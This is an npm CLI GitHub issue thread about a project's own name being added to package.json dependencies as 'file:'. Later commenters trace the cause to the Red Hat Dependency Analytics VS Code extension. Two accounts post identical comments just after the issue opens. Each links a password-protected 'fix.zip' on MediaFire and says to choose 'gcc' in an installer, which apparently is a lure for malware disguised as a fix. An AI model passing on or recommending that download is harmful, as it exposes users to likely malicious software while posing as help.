### ISSUE TITLE
[BUG] Project name was being added to dependencies automatically

### ISSUE THREAD

**Issue by naresh1054** [npm/cli#7753] opened 2024-08-26 09:59 UTC
### Is there an existing issue for this?

- [X] I have searched the existing issues

### This issue exists in the latest npm version

- [X] I am using the latest npm

### Current Behavior

Hi, 

i have a serverlss project whichh run on node 20. every time I open the protect a line with project name and "file:" was being added automatically.

tried removing the node-modules and package-lock file and doing a fresh install but this does not work. and also tried updating now to 22 and npm as well.

does anyone know the issue here?

### Expected Behavior

{
	"name": "example",
	"version": "1.0.0",
	"main": "index.js",
	"scripts": {
		"compile": "tsc",
		"start": "nodemon --exec \"npm run offline\" -e js,mjs,json,yml,yaml",
		"test": "jest",
		"test-coverage": "jest --coverage",
		"integration": "echo \"no test found\" ",
		"deploy-dev": "sls deploy -s dev",
		"offline": "serverless offline --httpPort 3007 --lambdaPort 3017"
	},
	"license": "ISC",
	"devDependencies": {
		"@types/aws-lambda": "^8.10.142",
		"eslint": "^9.7.0",
		"eslint-plugin-react": "^7.35.0",
		"jest": "^29.7.0",
		"jest-teamcity": "^1.12.0",
		"nodemon": "^3.1.4",
		"offline": "^0.0.1",
		"serverless": "^3.39.0",
		"serverless-iam-roles-per-function": "^3.2.0",
		"serverless-offline": "^13.6.0",
		"serverless-plugin-common-excludes": "^4.0.0",
		"serverless-plugin-include-dependencies": "^6.1.1",
		"serverless-plugin-log-retention": "^2.0.0",
		"serverless-plugin-typescript": "^2.1.5",
		"typescript": "^5.5.4"
	},
	"dependencies": {
		"aws-sdk": "^2.1663.0",
		"axios": "^1.7.4",
		"joi": "^17.13.3",
		"mssql": "^11.0.1",
		"example": "file:",
		"serverless-plugin-resource-tagging": "^1.2.0"
	}
}

"example": "file:", --> This line was being added automatically.

### Steps To Reproduce

1. In this environment...
2. With this config...
3. Run '...'
4. See error...

### Environment

- npm: 10.8.2
- Node.js: 22.7.0
- OS Name: Windows 11
- System Model Name: 64 bit intel
PS C:\Users\****\Desktop\Projects\prerp> npm config ls
; "user" config from C:\Users\knaresh\.npmrc

legacy-peer-deps = true

; node bin location = C:\Program Files\nodejs\node.exe
; node version = v22.7.0
; npm local prefix = C:\Users\***\Desktop\Projects\prerp
; npm version = 10.8.2
; cwd = C:\Users\***\Desktop\Projects\prerp
; HOME = C:\Users\****
; Run `npm config ls -l` to show all defaults.
64-bit

**Comment by seeronline** [comment] 2024-08-26 10:00
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment] 2024-08-26 10:00
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by milaninfy** [comment] 2024-08-26 13:28
@naresh1054 Please provide steps to reproduce to understand for which situation it's happening.

**Comment by naresh1054** [comment] 2024-08-26 13:40
@milaninfy I had a project a long time back, when I came back and tried starting it using the command **npm start** it started adding a new line in the dependencies section of package.json with key as project name and value as **"file:"**. I am facing the same issue in all of my projects. I tried deleting the lock file along with node_modules but still, the issue was not resolved.

**Comment by milaninfy** [comment] 2024-08-26 15:38
you mentioned that all your project is having this issue in the description, is it happening when you do `npm install` or when you do script run like `npm run start` ?

**Comment by naresh1054** [comment] 2024-08-27 03:54
It's happening in both scenarios: whether I remove the line from package.json and then run npm install, or simply remove the line from package.json without running any commands, the line gets automatically added back into the file.

**Comment by milaninfy** [comment] 2024-08-27 13:20
@naresh1054 Issue seems like unrelated to npm cli, but to be sure Could you please check the same with different version of npm?  e.g. if you are using 10.8.2, try with 10.7.0 of some other lower version if it's the same.

**Comment by seifeddine-brahem** [comment] 2024-08-28 01:27
@naresh1054 , if you are using VS code and installed the extension [Red Hat Dependency Analytics](https://marketplace.visualstudio.com/items?itemName=redhat.fabric8-analytics&ssr=false#review-details) disable it for now , for my case it was the problem with their last version  (V 0.9.5 )

**Comment by milaninfy** [comment] 2024-09-03 13:56
**Closing** due to age.  If this is still a problem please feel free to reopen this issue, or create a new issue w/ steps to reproduce.

**Closed as not planned by milaninfy** 2024-09-03 13:56 UTC
Labels: Bug, Cannot Reproduce

**Comment by ultimateshadsform** [comment] 2024-09-29 21:46
I have the same issue. Uninstalling Red Hat Dependency Analytics fixed it.

**Comment by naresh1054** [comment] 2024-09-30 03:03
yeah, I have this extension for my vs code. disabling it solved the issue. Thanks @seifeddine-brahem

**Comment by sscots** [comment] 2024-11-07 20:01
> @naresh1054 , if you are using VS code and installed the extension [Red Hat Dependency Analytics](https://marketplace.visualstudio.com/items?itemName=redhat.fabric8-analytics&ssr=false#review-details) disable it for now , for my case it was the problem with their last version (V 0.9.5 )

This worked for me. Thanks

**Comment by vicLim88** [comment] 2024-12-14 12:21
> @naresh1054 , if you are using VS code and installed the extension [Red Hat Dependency Analytics](https://marketplace.visualstudio.com/items?itemName=redhat.fabric8-analytics&ssr=false#review-details) disable it for now , for my case it was the problem with their last version (V 0.9.5 )

Worked for me too. Thank you so much.

**Comment by mattiach** [comment] 2025-01-20 12:33
I resolved it by uninstalling the Red Hat Dependency Analytics extension. Thank you.

**Comment by Hendrix-Maverick** [comment] 2025-05-19 18:57
> [@naresh1054](https://github.com/naresh1054) , if you are using VS code and installed the extension [Red Hat Dependency Analytics](https://marketplace.visualstudio.com/items?itemName=redhat.fabric8-analytics&ssr=false#review-details) disable it for now , for my case it was the problem with their last version (V 0.9.5 )

This did the trick for me!

**Comment by ainthek** [comment] 2025-09-30 12:01
This is happening to me with npm install `--prefix` on Windowsn (Git bash) with npm 10.9.3. 
The same constructiuon works well on WSL as well as OSX.
